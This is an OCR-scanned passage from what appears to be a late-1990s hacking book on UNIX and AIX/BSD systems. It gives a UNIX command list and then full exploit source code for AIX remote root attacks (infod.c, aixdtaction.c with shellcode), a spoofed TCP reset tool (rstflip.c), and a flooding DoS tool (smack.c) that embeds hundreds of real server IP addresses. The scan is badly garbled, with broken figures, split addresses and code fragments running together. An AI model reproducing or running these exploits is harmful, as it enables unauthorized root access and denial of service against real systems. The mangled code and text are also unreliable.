Operating systems are generally classified according to their host system functions, which may include supercomputers, mainframes, servers, workstations, desktops, and even handheld devices. The O/S dictates how data is saved to storage devices; it keeps track of filenames, locations, and security, while controlling all connected devices (as shown in Figure 10.1). When a computer is powered on, the operating system automatically loads itself into memory, initializes, and runs other programs. In addition, when other programs are running, the O/S continues to operate in the background. Popular operating systems include DOS, Microsoft Windows, MacOS, SunOS, and UNIX.
AIX, BSD, Digital, HP/UX, IRIX, UNIX, Linux, Macintosh, Windows, OS/2, SCO, Solaris, and VAX/VMS. We'll begin with UNIX.
UNIX
Hackers have been exploiting these operating systems since the beginning of their development, so the purpose of this section is to introduce the various hacking techniques used to manipulate them. The investigation will include
There are numerous exploits for every UNIX operating system type, and although extensive testing has not been performed nor documented, some exploits are interchangeable or can be modified for use on different UNIX types. Common breach methods against all UNIX flavors include root exploitation, buffer overflow attacks, flooding, and universal port daemon hijacking described earlier.
The following list of common deep-rooted commands can be used as a reference for UNIX exploit execution:
alias
View current aliases.
awk
Search for a pattern within a file.
bdiff
Compare two large files.
bfs
Scan a large file.
ca
Show calendar.
cat
Concatenate and print a file.
cc
C comp iler.
cd
Change directory.
chgrb
Change group ownership.
chmod
Change file permission.
chown
Change file ownership.
cmp
Compare two files.
comm
Compare common lines between two files.
cp
Copy file.
cu
Call another UNIX system.
date
Show date.
df
List mounted drives.
diff
Display difference between two files.
du
Show disk usage in blocks.
echo
Echo data to the screen or file.
ed
Text editor.
env
List current environment variables.
ex
Text editor.
expr
Evaluate mathematical formula.
find
Find a file.
f77
Fortran compiler
format
Initialize floppy disk.
grep
Search for a pattern within a file.
help
Help.
kill
Stop a running process.
ln
Create a link between two files.
ls List the files in a directory.
mail Send/receive mail.
mkdir Make directory.
more Display data file.
mv Move or rename a file.
nohup Continue running a command after logging out.
nroff Format text.
passwd Change password.
pkgadd Install a new program.
ps Lists the current running processes.
pwd Display the name of the working directory.
rm Remove file.
rmdir Remove directory.
set List shell variables.
setenv Set environment variables.
sleep Pause a process.
source Refresh and execute a file.
sort Sort files.
spell Check for spelling errors.
split Divide a file.
stty Set terminal options.
tail Display the end of a file.
tar Compress all specified files into one file.
touch Create an empty file.
troff Format output.
tset Set terminal type.
umask Specify new creation mask.
uniq Compare two files.
uucp UNIX to UNIX copy/execute.
vi Full-screen text editor.
volcheck Check for mounted floppy.
wc Displays detail.
who Show current users.
write Send a message to another user.
! Repeat command.
AIX
AIX, by IBM (www.ibm.com), is an integrated flavor of the UNIX operating system that supports 32-bit and 64-bit systems. The computers that run AIX include the entire range of RS/6000 systems, from entry-level servers and workstations to powerful supercomputers, such as the RS/6000 SP. Interestingly, AIX was the first O/S in its class to achieve independent security evaluations and to support options including C2 and B1 functions (see
ITCPJtf* 5u6-;yi-1«rTO vxj Struct {rCP^Atc**! Control Network rriloffat n
Servtitt
Figure 10.2 Remote AIX network configuration.
tems, it is possible to remotely manage AIX systems from anywhere on the Internet, as illustrated in Figure 10.2.
Liabilities
Illuminating Passwords
Synopsis: A diagnostic command can unveil passwords out of the shadow—the encoded one-way hash algorithm.
Hack State: Password exposure.
Vulnerabilities: AIX 3x/4x +.
Breach: When troubleshooting, AIX support teams generally request output from the snap -a command. As a diagnostic tool, this command exports system information (including passwords) into a directory on free drive space. With this potential threat, a hacker can target the /tmp/ib msupt/general/ directory and locate the password file, thus bypassing password shadowing.
Remote Root
Synopsis: AIX infod daemon has remote root login vulnerabilities.
Hack State: Unauthorized root access.
Vulnerabilities: AIX 3x/4x.
Breach: The Info Explorer module in AIX is used to centralize documentation; as such, it does not perform any validation on data sent to the local socket that is bounded. As a result, hackers can send bogus data to the daemon module, therefore tricking an initiated connection to the intruder's X display. Along with a false environment, by sending a user identification (UID) and group identification (GID) of 0, this daemon should be forced into spawning this connection with root privileges, as shown in the following program, infod.c, by UNIX guru Arisme.
infod.c
#include
#include
#include
#include
#include
#include
#include
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-0 9-98.AIX.INFOD
(http://www.repsec.com)"
#define NOUSER "Use : infofun [login]" #define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "
void send_environ(char *var,FILE *param) { char tempo[TAILLE_BUFFER]; int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
main(int argc,char** argv) { struct sockaddr_un sin,expediteur; struct hostent *hp; struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_pa
ram;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*point
eur;
FILE *param;
char *HOME,*LOGIN; int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir; LOGIN=info->pw_name; UID=info->pw_uid; GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0); sin.sun_family=AF_UNIX; strcpy(sin.sun_path,SOCK_PATH); taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<
0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256), 0, 0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256)); fwrite(buffer,1,2,param);
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0); fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID */
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment var
s but
it was good for debugging :) */
sprintf(buffer,"%c%c%c%c",2 3,0,0,0); fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo"); send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp"); send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG")); send_environ(buffer,param);
~sprintf(buffer,"LOGIN=%s",LOGIN); send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH")); send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs"); send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN); send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN); send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) "); send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN); send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE")); send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL")); send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos"); send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME); send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220"); send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]"); send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD); send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1"); send_environ(buffer,param);
sprintf(buffer,"%s","A z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,4 5,113,0); fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}
Hacker's The programs in this chapter can be found on the CD bundled with this book.
Remote Root
Synopsis: AIX dtaction and home environment handling have remote root shell vulnerabilities. Hack State: Unauthorized root access. Vulnerabilities: AIX 4.2.
Breach: With aixdtaction.c by UNIX guru Georgi Guninski, AIX 4.2 /usr/dt/bin/dtaction processes the ''Home" environment that can spawn a root shell.
aixdtaction.c
Use the IBM C compiler.
Compile with: cc -g aixdtaction.c
DISPLAY should be set.
Georgi Guninski guninski@hotmail.com
http://www.geocities.com/ResearchTriangle/1711 */
#include
char *prog="/usr/dt/bin/dtaction"; char *prog2="dtaction"; extern int execv();
char *createvar(char *name,char *value) {
char *c; int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);} ;
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
code[]={
0x9421fbb0 0x90610440 0x3c602f62 0x60636801 0x7c842278
0x90010458
0x3c60d002 0x6063696e 0x3863ffff 0x80410440
unsigned int 0x7c0802a6 , 0x60632c48 , 0x90610444 , 0x3c602f73 , 0x30610438 , 0x7c0903a6 ,
};
x3c60f019 0x60634c0c 0x90610438 0x9061043c 0x80010444
60634c0c 90610444 3c602f62 6063696e 90610438 3c602f73 60636801 3863ffff 9061043c 30610438 7c842278 80410440 80010444 7c0903a6
lis r3,r3,19468
st r3,1092(SP)
cau r3,r0,0x2f62
lis r3,r3,26990
st r3,1080(SP)
cau r3,r0,0x2f73
lis r3,r3,26625
addi r3,r3, -1
st r3,1084(SP)
lis r3, SP,1080
xor r4,r4,r4
lwz RTOC,1088(SP)
lwz r0,1092(SP) --jump
mtspr CTR,r0
#define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn=100; int max=280; unsigned int toc; unsigned int eco; unsigned int *pt; char *t;
unsigned int reta; /* return address */ int corr=3400; char *args[4]; char *newenv[8];
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters"); exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ff
ff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000f
fff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=(unsigned) &buf[0]+corr; for(nop=0;no>>>>>> where
A and B are the target current sessions. rstflip.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define TCPHDR sizeof(struct tcphdr) #define IPHDR sizeof(struct iphdr) #define PACKETSIZE TCPHDR + IPHDR
#define SLEEPTIME 30000 // depending on how fast can yo
u barf
#define LO_RST 1 // the packets out
#define HI_RST 2147483647 // do not ask me about this :)
#define ERROR FAILURE -1
#define ERROR_SUCCESS 0
void resolve_address(struct sockaddr *, char *, u_short); unsigned short in_cksum(unsigned short *,int );
int send_rst(char *, char *, u_short ,u_short , u_long, u_long,u_lo
ng);
int main(int argc, char *argv[])
{
int res,i,j;
int spoof_port,target_port;
if (argc < 7 || argc> 8 ) {
printf ("usage:
exit(ERROR_FAILURE);
}
for (i = atoi(argv[3]);i <= atoi(argv[4]); i++)
{
spoof_port = i;
for (j = atoi(argv[5]);j <= atoi(argv[6]); {
target_port = j; printf("%s : %d \t", argv[1],spoof_port); printf("-> %s :%d\n",argv[2], target_port);
res=send_rst(argv[1],argv[2],spoof_port,target_port, HI_RST,
HI_RST, 2);
usleep(SLEEPTIME);
res=send_rst(argv[1],argv[2],spoof_port,target_port,
LO_RST,LO_RST, 2);
usleep(SLEEPTIME);
} }
return ERROR_SUCCESS;
}
// here we put it together
int send_rst(char *fromhost, char *tohost, u_short fromport,u_short toport, u_long ack_sq, u_long s_seq, u_long spoof_id)
{
int i_result; int raw_sock;
static struct sockaddr_in local_sin, remote_sin; struct tpack{
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct pseudo_header{ // pseudo header 4 the checksu
m
unsigned source_address; unsigned dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; }pheader;
// resolve_address((struct sockaddr *)&local_sin, fromhost, fromp ort);
// resolve_address((struct sockaddr *)&remote_sin, tohost, topo
rt);
// TCP header
tpack.tcp.source=htons(fromport); // 16-
bit Source port number
tpack.tcp.dest=htons(toport); // 16-
bit Destination port
tpack.tcp.seq=ntohl(s_seq); // 32-
bit Sequence Number */
tpack.tcp.ack seq=ntohl(ack sq); // 32-
/
// Data offset */
// reserved */ // reserved */ // Urgent offset valid
// Acknowledgement field valid flag */
// Push flag */ // Reset flag */
sequence numbers flag */ // Finish sending flag
// 16-
bit Acknowledgement Number tpack.tcp.doff=5; tpack.tcp.res1=0; tpack.tcp.res2=0; tpack.tcp.urg=0;
flag */
// Synchronize
tpack.tcp.ack=1 tpack.tcp.psh=0 tpack.tcp.rst=1 tpack.tcp.syn=0 tpack.tcp.fin=0
*/
tpack.tcp.window=0; bit Window size */
tpack.tcp.check=0; // 16bit checksum (to be filled in below)
tpack.tcp.urg_ptr=0; bit urgent offset */
// 4-bit Version */
// 4-// 8-// 16-
// 16-bit ID field */
// 13-// 8-
// 8-bit Protocol */
// IP header tpack.ip.version=4;
tpack.ip.ihl=5; bit Header Length */
tpack.ip.tos=0; bit Type of service */
tpack.ip.tot_len=htons(IPHDR+TCPHDR) bit Total length */
tpack.ip.id=htons(spoof_id);
tpack.ip.frag_off=0; bit Fragment offset */
tpack.ip.ttl=64; bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP;
tpack.ip.check=0; // 16bit Header checksum (filled in below) */
tpack.ip.saddr=local_sin.sin_addr.s_addr;
// 32-bit Source Address */
tpack.ip.daddr=remote_sin.sin_addr.s_addr; // 32bit Destination
Address */
// IP header checksum tpack.ip.check=in cksum((unsigned short *)&tpack.ip,IPHDR);
sum += (sum >> 16);
answer = ~sum; // ones-
complement, then truncate to 16 bits return(answer);
}
// add carry
// Resolve the address and populate the sin structs
void resolve_address(struct sockaddr * addr, char *hostname,
t port)
u_shor
struct sockaddr_in *address; struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
address->sin_family = AF_INET; address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname); if ((int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname);
if (host) {
bcopy( host->h_addr, (char *)&address-
>sin_addr,host->h_length);
~ ~} else {
puts("Couldn't resolve the address!!!");
exit(ERROR_FAILURE);
}
}
}
BSD Panic Attack
Synopsis: A BSD DoS attack, smack.c, sends random ICMP-unreachable packets from customized random IP addresses.
Vulnerabilities: All.
Breach: This DoS attack, modified by Iron Lungs, results in platform freezes, as the victim receives thousands of packets from the customizable addresses between the */Start and End customizing sections.
smack.c
*/
#include
#include
char conn_pack0[] = { -128, 0, 0, 12, 1, 81, 85, 65, 75, 69, 0, 3 } ; char conn_pack1[] = { -1,-1,-1, -
1,99,111,110,110,101,99,116,32,34,92,110,111,
101, 92,50, 53,48,48, 92,98,111,116,116,111,109,99,111,
108,111,114,92,49,98,92,116,111,112,99,111,108,111,114,
92,110,97,109,101,92,83,110,111,111,112,121,34
,10
};
#define PS0 20+8+12
#define PS1 20+8+strlen(conn_pack1)
char *servers[] = {
*/ Start customizing here
"129.15.3.38:26000:0",
"207.123.126.4:26000:0",
"129.15.3.38:26001:0",
"129.15.3.38:26002:0",
"192.107.41.7:26000:0",
"157.182.246.58:26000:0",
"128.52.42.22:26000:0",
"209.51.213.12:26000:0",
"209.112.14.200:26000:0",
"144.92.218.112:26000:0",
"200.239.253.14:26000:0",
"134.147.141.98:26000:0",
"137.48.127.127:26000:0",
"209.51.192.228:26000:0"
"159.134.244.134:26000:0",
"207.229.129.193:26000:0",
"194.125.2.219:26001:0",
"206.98.138.162:26000:0",
"134.193.111.241:26000:0",
"207.40.196.13:26000:0",
"209.26.6.121:26000:0",
"208.194.67.16:26000:0",
"205.163.58.20:26000:0",
"199.247.156.6:26000:0",
"12.72.1.37:26000:0",
"216.65.157.101:26000:0",
"206.103.0.200:26000:0",
"207.198.211.22:26000:0",
"148.176.238.89:26000:0",
"208.255.165.53:26000:0",
"208.240.197.32:26000:0",
"209.192.31.148:26000:0",
"159.134.244.132:26000:0",
"195.96.122.8:26000:0",
"209.30.67.88:26000:0",
"209.36.105.50:26000:0",
"62.136.15.45:26000:0",
"208.18.129.2:26000:0",
"208.0.188.6:26000:0",
"2 08.137.128.24:2 6000:0",
"198.106.23.1:26000:0",
"209.122.33.45:26000:0",
"208.23.24.79:26000:0",
"200.34.211.10:26000:0",
"208.45.42.111:26000:0",
"203.23.47.43:26000:0",
"207.239.192.51:2 6000:0",
"165.166.140.122:26000:0",
"207.19.125.13:26000:0",
"144.92.229.122:2 6000:0",
"199.202.71.203:2 6000:0",
"200.255.244.2:26000:0",
"207.30.184.9:26000:0",
"129.18 6.121.53:2 6000:0",
204
.210
.15
.71:
26000
0",
198
.101
.39
.41:
26000
0",
203
.45.
23.
123:
26000
0",
205
.23.
45.
223:
26000
0",
34.
224.
14.
118:
26000
0",
200
.24.
34.
116:
26000
0",
133
.45.
342
.124
:26000:0",
"192.52.220.101:26000:0",
"194.126.80.142:26000:0",
"206.171.181.1:26000:0",
"208.4.5.9:26000:0",
"206.246.194.16:26000:0",
"205.139.62.15:26000:0",
"204.254.98.15:26000:0",
"207.206.116.41:26000:0",
"208.130.10.26:26000:0 ",
"207.126.70.69:26000:0",
"38.241.229.103:26000:0",
"204.170.191.6:26000:0",
"144.92.243.243:26000:0",
"144.92.111.117:26000:0",
"194.229.103.195:26000:0",
"208.134.73.42:26000:0",
"207.64.79.1:26000:0",
"171.64.65.70:26004:0",
"207.13.110.4:26000:0",
"204.253.208.245:26000:0",
"165.166.144.45:26000:0",
"128.252.22.47:26000:0",
"204.210.15.71:26001:0",
"193.88.50.50:26000:0",
"209.155.24.25:26000:0",
"204.49.131.19:26000:0",
"199.67.51.102:26000:0",
"207.114.144.200:26000:0",
"165.166.140.140:26000:0",
"38.233.80.136:26000:0",
"204.216.57.249:26000:0",
"199.72.175.4:26000:0",
"204.91.237.250:26000:0",
"206.191.0.209:26000:0",
"194.109.6.220:26000:0",
"207.67.188.25:26000:0",
"160.45.32.176:26000:0",
"206.246.194.15:26000:0",
"207.65.182.12:26000:0",
"204.213.176.8:26000:0",
"207.99.85.67:26000:0",
"209.172.129.66:26000:0",
"132.230.63.23:26000:0",
"206.149.144.14:26000:0",
"147.188.209.113:26000:0",
"204.141.86.42:26000:0",
"207.8.164.27:26000:0",
"204.254.98.11:26000:0",
"204.216.126.251:26000:0",
"207.206.65.5:26000:0",
"209.12.170.11:26000:0",
"131.111.226.98:26000:0",
"194.65.5.103:26000:0",
"204.202.54.95:26000:0",
"204.97.179.4:26000:0",
"24.0.147.54:26000:0",
"207.170.48.24:26000:0",
"199.217.218.8:26000:0",
"207.166.192.85:26000:0",
"206.154.148.145: 26000:0",
"206.248.16.16:26000:0",
"200.241.188.3:26000:0",
"204.177.71.10:26000:0",
"140.233.207.207:26000:0",
"207.218.51.13:26000:0",
"194.109.6.217:26000:0",
"207.236.41.30:26000:0",
"195.162.196.42:26000:0",
"209.49.51.98:26020:0",
"198.106.166.188:26000:0",
"207.239.212.113:26000:0",
"165.91.3.91:26000:0",
"128.95.25.184:26666:0",
"128.2.237.78:26001:0",
"128.2.237.78:26003:0",
"207.254.73.2:26000:0",
"208.225.207.3:26666:0",
"171.64.65.70:26666:0",
"208.225.207.3:26001:0",
"128.2.237.78:26000:0",
"129.21.113.71:26000:0",
"195.74.96.45:26000:0",
"206.129.112.27:26000:0",
"199.67.51.101:26000:0",
"38.156.101.2:26000:0",
"204.177.39.44:26000:0",
"207.173.16.53:26000:0",
"207.175.30.130:26123:0",
"128.52.38.15:26000:0",
"204.49.131.19:26666:0",
"129.21.114.129:26666:0",
"128.2.237.78:26002:0",
"18.238.0.24:26001:0",
"140.247.155.208:26000:0",
"208.137.139.8:26000:0",
"141.219.81.85:26000:0",
"208.203.244.13:26000:0",
"208.137.128.24:26020:0",
"140.180.143.197:26666:0",
"205.189.151.3:26000:0",
"199.247.126 .23:26000:0",
"18.238.0.24:26002:0",
"206.98.138.166:26000:0",
"128.2.74.204:26000:0",
"198.87.96.254:26000:0",
"204.209.212.5:26000:0",
"207.171.0.68:26002:0",
"159.134.244.133:26000:0",
"195.170.128.5:26000:0",
"198.164.230.15:26000:0",
"130.236.249.227: 26000:0",
"193.88.50.50:26001:0",
"143.44.100.20:26000:0",
"129.15.3.39:26000:0",
"205.219.23.3:26000:0",
"205.177.27.190:26000:0",
"207.172.7.66:26000:0",
"209.144.56.16:26000:0",
"128.164.141.5:26000:0",
"129.2.237.36:26000:0",
"206.98.138.165:26000:0",
"194.100.105.71:26000:0",
"194.158.161.28:26000:0",
"203.87.2.13:26000:0",
"141.219.83.69:26000:0",
"198.83.6.70:26000:0",
"35.8.144.96:26000:0",
"206.196.57.130:26000:0",
"206.31.102.16:26000:0",
"207.23.43.3:26000:0",
"207.18.86.50:26000:0",
"207.87.203. 20:26000:0",
"198.161.102.213:26000:0",
"24.1.226.74:26000:0",
"207.207.32.130:26000:0",
"165.166.140.160:26000:0",
"204.248.210.20:26000:0",
"207.87.203.28:26000:0",
"165.166.140.111:26000:0",
"24.3.132.9:26000:0",
"205.217.206.189:26000:0",
"207.99.85.69:26000:0",
"192.124.43.75:26000:0",
"199.72.175.156:26000:0",
"209.98.3.217:26000:0",
"206.154.138.8:26000:0",
"205.199.137.12:26000:0",
"204.177.184.31:26000:0",
"192.124.43.73:26000:0",
"171.64.65.70:26000:0",
"165.91.21.113:26000:0",
"198.17.249.14:26000:0",
"156.46.147.17:26000:0",
"207.13.5.18:26000:0",
"208.212.201.9:26000:0",
"207.96.243.5:26000:0",
"206.196.153.201:26000:0",
"204.171.58.6:26000:0",
"140.180.143.197:26000:0",
"207.3.64.52:26000:0",
"207.65.218.15:26000:0",
"194.42.225.247:26000:0",
"205.228.248.27:26000:0",
"204.216.126.250:26000:0",
"128.230.33.90:26000:0",
"128.163.161.105:26000:0",
"208.0.122.12:26000:0",
"206.53.116.243:26000:0",
"199.76.206.54:26000:0",
"194.239.134.18:26000:0",
"208.153.58.17:26000:0",
"206.147.58.45:26000:0",
"204.220.36.31:26000:0",
"207.239.212.107:26000:0",
"206.230.18.20:26000:0",
"195.18.128.10:26000:0",
"151.198.193.6:26000:0",
"208.0.122.11:26000:0",
"206.149.80.99:26000:0",
"207.239.212.244:26000:0",
"129.128.54.168:26000:0",
"194.229.154.41:26000:0",
"207.51.86.22:26000:0",
"207.201.91.8:26000:0",
"205.216.83.5:26000:0",
"208.201.224.211:26000:0",
"194.144.237.50:26000:0",
"147.83.61.32:26000:0",
"136.201.40.50:26000:0",
"132.235.197.72:26000:0",
"195.173.25.34:26000:0", "194.143.8.153:26000:0", "194.109.6.218:26000:0", "18.238.0.24:26000:0", "129.21.112.194:26000:0", "128.253.185.87:26000:0", "206.183.143.4:26000:0" "130.234.16.21:26000:0" "148.202.1.5:26000:0", "167.114.26.50:26000:0" "169.197.1.154:26000:0" "207.0.164.8:26000:0", "207.243.123.2:26000:0" "207.106.42.14:26000:0" "198.161.102.18:26000:0", "202.218.50.24:26000:0" "205.139.35.22:26000:0" "193.74.114.41:26000:0" "199.217.218.008:26000:0", "129.15.3.37:26000:0", "130.240.195.72:26000:0", "205.164.220.20:26000:0", "209.90.128.16:26000:0", "200.241.222.88:26000:0", "194.213.72.22:26000:0", "206.112.1.31:26000:0", "132.230.153.50:26000:0",
"206.251.130.20:26000:0",
"195.238.2.30:26000:0",
"193.164.183.3:26000:0",
"150.156.210.232:26000:0",
"193.13.231.151:26000:0",
"200.18.178.7:26000:0",
"206.20.111.7:26000:0",
"192.89.182.26:26000:0",
"207.53.96.12:26000:0",
"194.64.176.5:26000:0",
"203.19.214.28:26000:0",
"130.241.142.10:26000:0",
"207.48.50.10:26000:0",
"129.13.209.22:26000:0",
"194.243.65.2:26000:0",
"194.19.128.13:26000:0",
"202.27.184.4:26000:0",
"194.204.5.25:26000:0",
"200.241.93.2:26000:0",
"194.125.148.2:26000:0",
"130.237.233.111:26000:0",
"139.174.248.165:26000:0",
"207.78.244.40:26000:0",
"195.74.0.69:26000:0",
"203.55.240.1:26000:0",
"203.61.156.162:26000:0",
"203.61.156.164:26000:0",
"195.90.193.138:2 6000:0",
"195.94.179.5:26000:0",
"203.23.237.110:2 6000:0",
"200.18.178.14:26000:0",
"200.248.241.1:26000:0",
"203.17.103.34:26000:0",
"131.151.52.105:26000:0",
"200.250.234.39:26000:0",
"203.29.160.21:26000:0",
"206.41.136.94:26000:0",
"202.49.244.17:26000:0",
"196.25.1.132:26000:0",
"206.230.102.9:26000:0",
"206.25.117.125:2 6000:0",
"200.246.5.28:26000:0",
"200.255.96.24:26000:0",
"195.94.179.25:26000:0",
"195.224.47.44:26000:0",
"200.248.241.2:26000:0",
"203.15.24.46:26000:0",
"199.217.218.7:26000:0",
"200.246.248.9:26000:0",
"200.24 6.227.44:2 6000:0",
"202.188.101.246:26000:0",
"207.212.176.26:26000:0",
"200.255.218.41:2 6000:0",
"200.246.0.248:26000:0",
"209.29.65.3:26000:0",
"203.32.8.197:26000:0",
"200.248.149.31:2 6000:0",
"200.246.52.4:26000:0",
"203.17.23.13:26000:0",
"206.196.57.130:2 6001:0",
"130.63.74.16:26000:0",
"203.16.135.34:26000:0",
"195.66.200.101:2 6000:0",
"199.217.218.007:26000:0",
"203.30.239.5:26000:0",
"128.206.92.47:26000:0",
"203.17.23.9:26000:0",
"205.139.59.121:26000:0",
"136.159.102.88:2 6000:0",
"207.152.95.9:26000:0",
"205.197.242.62:2 6000:0",
"204.119.24.237:2 6000:0",
"200.246.163.6:26000:0",
"206.96.251.44:26000:0",
"203.61.156.165:2 6000:0",
"207.0.129.183:26000:0",
"194.117.157.74:26000:0",
"206.83.174.10:26000:0",
"204.171.44.26:26000:0",
"204.216.27.8:26000:0",
"148.217.2.200:26000:0",
"193.13.231.149:26000:0",
"204.157.39.7:26000:0",
"208.194.67.16:26012:0",
"137.123.210.80:26000:0",
"149.106.37.197:26000:0",
"207.207.248.20:26000:0",
"143.195.150.40:2 6000:0",
"204.90.102.49:26000:0",
"209.48.89.1:26000:0",
"130.126.195.94:26000:0",
"134.193.111.241:26500:0",
"205.218.60.98:26001:0",
"205.218.60.98:26000:0",
"165.91.20.158:26000:0",
"206.248.16.16:26001:0",
"206.248.16.16:26002:0",
"149.156.159.100:26000:0",
"163.1.138.204:26000:0",
"204.177.71.250:26000:0",
"207.25.220.40:26000:0",
"206.25.206.10:26000:0",
"204.253.208.225:26000:0",
"203.59.24.229:26000:0",
"200.255.216.11:26000:0",
"128.143.244.38:26000:0",
"128.113.161.123:26000:0",
"128.138.149.62:26000:0",
"128.175.46.96:26000:0",
"204.210.15.62:26000:0",
"204.210.15.62:26001:0",
"206.83.174.9:26000:0",
End customization /* NULL
};
int i, s, fl, ret; unsigned int sp, dp; struct in_addr src, dst; struct sockaddr_in addr; char pack[1024]; struct ip *iph; struct udphdr *udph; int read_data(void); int parse_in(char *);
int addserv(char *, unsigned int, char); void main(int argc, char *argv[])
{
iph = (struct ip *)pack;
udph = (struct udphdr *)(iph + 1);
if (argc < 2) {
printf("Usage: ./smack
exit(-1);
printf("Slinging Packets \n");
src.s_addr = inet_addr(argv[1]); if (src.s_addr == -1) {
printf("Invalid source IP: %s\n", argv[1]);
exit(-1);
}
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1) {
perror("socket"); exit(-1);
}
fl = 1;
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, &fl, sizeof(int)); if (ret == -1) {
perror("setsockopt"); exit(-1);
}
bzero((char *)&addr, sizeof(addr)); addr.sin_family = AF_INET; read_data();
printf("UnFed.\n");
}
int parse_in(char *in)
{
int i, n, c, m, ret; char ip[16], tmp[6], mode, tmp2; unsigned int port;
bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0; tmp2 = 0;
for (i = 0; i < strlen(in); i++) {
if (in[i] != ' ') { if (in[i] != ':') { if (m == 0) { ip[c] = in[i];
c++;
}
if (m == 1) {
tmp[c] = in[i];
c++;
}
if (m == 2) {
tmp2 = in[i]; break;
}
}
else {
m++; c = 0;
}
}
}
port = (unsigned int)atoi(tmp);
mode = (tmp2 - 48); addserv(ip, port, mode); return ret;
int read_data(void)
{
int i;
char in[1024];
for (i = 0; i < 32767; { if (servers[i] == NULL)
break; parse_in(servers[i]);
}
